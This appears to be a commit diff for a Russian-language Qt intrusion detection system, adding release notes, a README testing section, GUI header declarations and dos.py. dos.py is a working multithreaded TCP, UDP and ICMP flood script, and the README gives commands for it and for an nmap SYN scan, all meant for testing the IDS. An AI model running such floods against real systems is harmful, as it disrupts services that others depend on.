new-release

Author: scrollDynasty

LICENSE

@@ -1,6 +1,6 @@
 MIT License
 
-Copyright (c) 2024 Intrusion Detection System (IDS)
+Copyright (c) 2025 Intrusion Detection System (IDS)
 
 Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to deal

README.md

@@ -61,6 +61,15 @@
 
 > **Рекомендация:** Если вам нужно обнаруживать атаки в реальной сети, рассмотрите возможность установки IDS на пограничном устройстве (например, на маршрутизаторе) или настройте port mirroring на коммутаторе.
 
+## ✨ Новые функции и улучшения в версии 3.1.2
+
+### 🐛 Исправления и улучшения интерфейса
+- **Улучшена поддержка кириллических символов** — исправлена кодировка UTF-8 во всех формах и сообщениях
+- **Перевод интерфейса на русский язык** — все диалоговые окна и кнопки теперь корректно отображаются на русском
+- **Добавлено диалоговое окно "О программе"** — реализован информационный диалог с данными о версии и функциях
+- **Усовершенствована система сохранения логов** — добавлен запрос на сохранение при выходе из программы
+- **Улучшена работа с зашифрованными логами** — оптимизирована работа с .enc файлами и механизм проверки пароля
+
 ## ✨ Новые функции и улучшения в версии 3.1.1
 
 ### 🐛 Исправления багов
@@ -362,6 +371,65 @@ chmod +x run_docker_mac.sh
 - [ ] **Профили мониторинга** — создание и сохранение различных профилей для мониторинга
 - [ ] **Интеграция с базами данных угроз** — проверка IP-адресов по базам известных угроз
 
+## 🧪 Тестирование программы
+
+Для проверки работоспособности системы и обнаружения различных типов атак вы можете использовать включенные в дистрибутив скрипты и утилиты.
+
+### 📊 Проверка с помощью Python-скрипта для DOS-атак
+
+1. **Запустите IDS** и выберите сетевой интерфейс для мониторинга
+2. **Откройте командную строку** от имени администратора
+3. **Запустите Python-скрипт для DOS-атаки** с параметрами:
+
+```bash
+# Для TCP атаки
+python dos_attack.py -t 127.0.0.1 -p 80 -m tcp -d 10 -c 100
+
+# Для UDP атаки
+python dos_attack.py -t 127.0.0.1 -p 53 -m udp -d 10 -c 50
+
+# Для ICMP (ping) атаки
+python dos_attack.py -t 127.0.0.1 -m icmp -d 10 -c 50
+```
+
+Где:
+- `-t` (--target): целевой IP-адрес
+- `-p` (--port): целевой порт (не требуется для ICMP)
+- `-m` (--mode): режим атаки (tcp, udp, icmp)
+- `-d` (--duration): продолжительность в секундах
+- `-c` (--connections): количество одновременных соединений
+
+**Результат**: IDS должна обнаружить и отобразить подозрительную активность в таблице подозрительных IP и журнале событий.
+
+### 🔍 Проверка с помощью Nmap
+
+1. **Запустите IDS** и выберите сетевой интерфейс для мониторинга
+2. **Запустите скрипт тестирования** с помощью Nmap:
+
+```bash
+# Используя BAT файл
+test_scan.bat
+
+# Или напрямую с помощью Nmap
+nmap -sS -p 1-1000 127.0.0.1
+```
+
+**Результат**: IDS должна обнаружить серию TCP SYN пакетов, распознать их как сканирование портов и отобразить в таблице подозрительных IP.
+
+### 🔄 Интерпретация результатов тестирования
+
+При успешном тестировании вы должны увидеть:
+1. **Увеличение счетчика пакетов** в статусной строке
+2. **Появление новых записей** в таблице подозрительных IP
+3. **Предупреждающие сообщения** в журнале событий
+4. **Цветовую индикацию** угроз в зависимости от количества обнаруженных пакетов
+
+Если какой-либо из тестов не дает ожидаемых результатов, проверьте:
+- Правильно ли выбран сетевой интерфейс
+- Запущена ли программа с правами администратора
+- Включен ли режим promiscuous
+- Не блокирует ли антивирус или брандмауэр сетевую активность
+
 ## 📜 Лицензия
 
 Этот проект распространяется под лицензией **MIT**. Подробности смотрите в файле [LICENSE](LICENSE).

dos.py

@@ -0,0 +1,195 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+ПРОСТОЙ СКРИПТ ДЛЯ DOS-АТАКИ (НЕ ИСПОЛЬЗОВАТЬ НА РЕАЛЬНЫХ ЦЕЛЯХ!)
+==================================================================
+
+КАК ПОЛЬЗОВАТЬСЯ ЭТИМ СКРИПТОМ:
+------------------------------
+
+1. Этот скрипт предназначен ТОЛЬКО для тестирования ваших собственных систем.
+   НИКОГДА не используйте его для атаки на чужие системы - это незаконно!
+
+2. Запуск в командной строке или PowerShell:
+   ----------------------------------------
+   
+   Windows: py -3 dos.py -t IP_АДРЕС_ЦЕЛИ -p ПОРТ -a ТИП_АТАКИ -d ВРЕМЯ -c СОЕДИНЕНИЯ
+   Linux/Mac: python3 dos.py -t IP_АДРЕС_ЦЕЛИ -p ПОРТ -a ТИП_АТАКИ -d ВРЕМЯ -c СОЕДИНЕНИЯ
+
+3. ПРИМЕРЫ КОМАНД:
+   -------------
+   
+   # TCP-атака на порт 80 (веб-сервер) в течение 10 секунд с 2 соединениями:
+   py -3 dos.py -t 192.168.100.16 -p 80 -a tcp -d 10 -c 2
+   
+   # UDP-атака на порт 53 (DNS) в течение 15 секунд с 3 соединениями:
+   py -3 dos.py -t 192.168.100.16 -p 53 -a udp -d 15 -c 3
+   
+   # ICMP-атака (ping) в течение 20 секунд:
+   py -3 dos.py -t 192.168.100.16 -a icmp -d 20 -c 1
+
+4. ПАРАМЕТРЫ КОМАНДЫ:
+   ----------------
+   
+   -t, --target     : IP-адрес цели (обязательный параметр)
+   -p, --port       : Порт для атаки (по умолчанию 80)
+   -a, --attack     : Тип атаки: tcp, udp или icmp (по умолчанию tcp)
+   -d, --duration   : Сколько секунд будет идти атака (по умолчанию 60)
+   -c, --connections: Сколько одновременных соединений (по умолчанию 1)
+
+5. ВАЖНО:
+   -----
+   
+   * Для ICMP-атаки требуются права администратора/root
+   * Если атака неудачна, проверьте:
+     - Правильно ли указан IP-адрес
+     - Открыт ли указанный порт на целевой машине
+     - Не блокирует ли ваш брандмауэр исходящие соединения
+"""
+
+import socket
+import threading
+import random
+import time
+import argparse
+from datetime import datetime
+
+def print_status(sent, target):
+    """Выводит на экран информацию о количестве отправленных пакетов"""
+    print(f"[{datetime.now().strftime('%H:%M:%S')}] Отправлено {sent} пакетов на {target}")
+
+def dos_attack(target_ip, target_port, attack_type="tcp", duration=60):
+    """
+    Выполняет DOS-атаку на указанный IP-адрес
+    
+    Параметры:
+    target_ip - IP-адрес цели
+    target_port - порт на целевой машине
+    attack_type - тип атаки (tcp, udp, icmp)
+    duration - продолжительность атаки в секундах
+    """
+    total_packets = 0
+    successful_packets = 0
+    failed_packets = 0
+    
+    # Определим время окончания атаки
+    end_time = time.time() + duration
+    
+    print(f"Начало DOS-атаки на {target_ip}:{target_port} используя {attack_type.upper()}")
+    
+    try:
+        while time.time() < end_time:
+            if attack_type.lower() == "tcp":
+                # TCP атака
+                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+                s.settimeout(1)
+                try:
+                    s.connect((target_ip, target_port))
+                    s.send(b"X" * random.randint(1024, 2048))
+                    total_packets += 1
+                    successful_packets += 1
+                except socket.timeout:
+                    total_packets += 1
+                    failed_packets += 1
+                    if failed_packets % 10 == 0:
+                        print(f"Соединение с {target_ip}:{target_port} не удалось (таймаут)")
+                except socket.error as e:
+                    total_packets += 1
+                    failed_packets += 1
+                    if failed_packets % 10 == 0:
+                        print(f"Ошибка соединения с {target_ip}:{target_port}: {e}")
+                finally:
+                    s.close()
+            
+            elif attack_type.lower() == "udp":
+                # UDP атака
+                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+                data = b"X" * random.randint(1024, 65500)
+                try:
+                    s.sendto(data, (target_ip, target_port))
+                    total_packets += 1
+                    successful_packets += 1
+                except socket.error as e:
+                    total_packets += 1
+                    failed_packets += 1
+                    if failed_packets % 10 == 0:
+                        print(f"Ошибка отправки UDP пакета на {target_ip}:{target_port}: {e}")
+                finally:
+                    s.close()
+            
+            elif attack_type.lower() == "icmp":
+                # ICMP flood (ping)
+                try:
+                    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
+                    s.sendto(b"X" * 56, (target_ip, 0))
+                    total_packets += 1
+                    successful_packets += 1
+                except PermissionError:
+                    print("ICMP атака требует прав администратора")
+                    print("Запустите скрипт от имени администратора (с правами админа):")
+                    print("В Windows: Правый клик на командной строке -> Запуск от имени администратора")
+                    print("В Linux/Mac: sudo python3 dos.py ...")
+                    return
+                except socket.error as e:
+                    total_packets += 1
+                    failed_packets += 1
+                    if failed_packets % 10 == 0:
+                        print(f"Ошибка отправки ICMP пакета на {target_ip}: {e}")
+                finally:
+                    s.close()
+            
+            # Выводим статус каждые 100 пакетов или каждые 5 секунд
+            if total_packets % 100 == 0 or (total_packets > 0 and time.time() % 5 < 0.1):
+                print_status(total_packets, f"{target_ip}:{target_port} (успешно: {successful_packets}, неудачно: {failed_packets})")
+                
+            # Небольшая задержка для уменьшения нагрузки на систему
+            time.sleep(0.01)
+    
+    except KeyboardInterrupt:
+        print("Атака остановлена пользователем (нажатием Ctrl+C)")
+    
+    print(f"Атака завершена. Всего отправлено {total_packets} пакетов (успешно: {successful_packets}, неудачно: {failed_packets})")
+
+# Если скрипт запущен напрямую (а не импортирован)
+if __name__ == "__main__":
+    # Создаем парсер аргументов командной строки
+    parser = argparse.ArgumentParser(description="Простой скрипт DOS-атаки для тестирования систем обнаружения вторжений")
+    
+    # Добавляем аргументы
+    parser.add_argument("-t", "--target", required=True, help="Целевой IP-адрес")
+    parser.add_argument("-p", "--port", type=int, default=80, help="Целевой порт (по умолчанию 80)")
+    parser.add_argument("-a", "--attack", choices=["tcp", "udp", "icmp"], default="tcp", help="Тип атаки (tcp, udp, icmp)")
+    parser.add_argument("-d", "--duration", type=int, default=60, help="Продолжительность атаки в секундах (по умолчанию 60)")
+    parser.add_argument("-c", "--connections", type=int, default=1, help="Количество одновременных соединений (по умолчанию 1)")
+
+    # Разбираем аргументы
+    args = parser.parse_args()
+    
+    # Проверяем соединения и предупреждаем пользователя
+    if args.connections > 10:
+        print(f"ВНИМАНИЕ: Вы запускаете {args.connections} потоков. Это может привести к высокой нагрузке на вашу систему.")
+        input("Нажмите Enter для продолжения или Ctrl+C для отмены...")
+    
+    # Выводим информацию о запущенной атаке
+    print(f"==================================================")
+    print(f"Запуск DOS-атаки со следующими параметрами:")
+    print(f"Цель: {args.target}")
+    print(f"Порт: {args.port}")
+    print(f"Тип атаки: {args.attack}")
+    print(f"Продолжительность: {args.duration} секунд")
+    print(f"Соединения: {args.connections}")
+    print(f"==================================================")
+    print(f"[ПРЕДУПРЕЖДЕНИЕ] Используйте только для тестирования своих систем!")
+    print(f"==================================================")
+    
+    # Запускаем несколько потоков для большей нагрузки
+    threads = []
+    for i in range(args.connections):
+        t = threading.Thread(target=dos_attack, args=(args.target, args.port, args.attack, args.duration))
+        threads.append(t)
+        t.start()
+    
+    # Ждем завершения всех потоков
+    for t in threads:
+        t.join() 

include/MainWindow.h

@@ -5,6 +5,7 @@
 #include <QTimer>
 #include <QStandardItemModel>
 #include <QStringList>
+#include <QCloseEvent>
 #include "PacketHandler.h"
 #include "DeviceManager.h"
 #include "SuspiciousIPModel.h"
@@ -20,6 +21,10 @@ class MainWindow : public QMainWindow {
     explicit MainWindow(QWidget *parent = nullptr);
     ~MainWindow();
 
+protected:
+    // Переопределяем метод обработки события закрытия окна
+    void closeEvent(QCloseEvent *event) override;
+
 private slots:
     void onStartCapture();
     void onStopCapture();
@@ -36,6 +41,15 @@ private slots:
 
     // Метод для генерации тестового трафика
     void generateTestTraffic();
+    
+    // Методы для работы с шифрованием логов
+    void onEncryptionToggled(bool checked);
+    void onSaveEncryptedLog();
+    void onLoadEncryptedLog();
+    void showPasswordDialog(bool forSaving);
+    
+    // Метод для отображения диалога "О программе"
+    void showAboutDialog();
 
 private:
     Ui::MainWindow *ui;
@@ -55,11 +69,26 @@ private slots:
 
     // Таймер для генерации тестового трафика
     QTimer *testTrafficTimer;
+    
+    // Для шифрования логов
+    QString lastEncryptionPassword;
+    
+    // Флаг сохранения логов - чтобы не спрашивать дважды
+    bool logsSaved = false;
 
     void setupModernUI();
     void setupConnections();
+    void setupMenus();
     void addSuspiciousIP(const QString& sourceIP, const QString& destinationIP, 
-                        const QString& packetType, const QString& timestamp);
+                         const QString& packetType, const QString& timestamp);
+    
+    // Новые методы для работы с логами
+    void loadLogFile(const QString& filePath, const QString& password);
+    void processLogLine(const QString& line);
+    bool maybeSaveLog();  // Метод для предложения сохранить логи
+    
+    // Метод для сохранения логов
+    bool saveLogsToFile(const QString& fileName, bool encrypted);
 };
 
 #endif // MAINWINDOW_H